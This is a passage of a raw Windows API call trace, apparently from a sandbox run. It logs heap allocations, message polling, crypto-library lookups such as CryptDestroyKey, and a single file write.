[0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0249.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0249.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x200) returned 0x3bf0680 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0478 | out: hHeap=0x970000) returned 1 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0249.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0249.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0249.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0249.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0249.037] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0249.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0249.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0249.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0249.037] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0249.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0249.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0249.037] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0249.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0249.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0249.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0249.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0249.038] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0249.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0249.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0249.038] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.038] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0249.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0249.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0249.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0249.038] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0249.038] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.038] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0249.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0249.038] WriteFile (in: hFile=0x2d0, lpBuffer=0x2e563b0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2e563b0*, lpNumberOfBytesWritten=0x8cf5e4*=0x200, lpOverlapped=0x0) returned 1 [0249.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0249.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0249.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0249.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0249.040] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0249.040] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0249.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0249.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0249.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0249.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0249.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0249.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0249.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0249.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0249.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0249.041] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.041] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0249.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0249.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0249.041] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0249.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0249.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0249.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0249.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51898, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0249.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0249.102] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0249.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0249.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0249.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0249.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0249.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.102] CryptDestroyKey (hKey=0xa876d0) returned 1 [0249.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563b0 [0249.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0249.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0249.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0249.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0249.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0249.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0249.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0249.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0249.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0249.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0249.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0249.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0249.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0249.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0249.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0050 [0249.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0249.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563b0 | out: hHeap=0x970000) returned 1 [0249.104] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0249.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0249.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0249.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0249.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0249.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0249.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0249.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0249.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0249.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0249.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0249.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0249.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0249.105] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0249.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0249.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0249.105] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0249.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0249.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0249.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0249.105] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0249.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0249.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0249.105] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0249.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0249.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0249.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0249.106] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0249.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0249.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0249.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0249.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0249.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0249.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0249.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0249.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0249.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0249.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0249.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513e8 [0249.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0249.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0249.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0249.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0249.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0249.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0249.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0249.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0249.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0249.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0249.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0249.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0249.108] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0249.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0249.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0249.108] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0249.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0249.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0249.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0249.108] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0249.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0249.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0249.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0249.108] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0249.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0249.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0249.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0249.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0249.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0249.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0249.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0249.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0249.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0249.109] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0249.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0249.109] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0249.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0249.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.109] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, 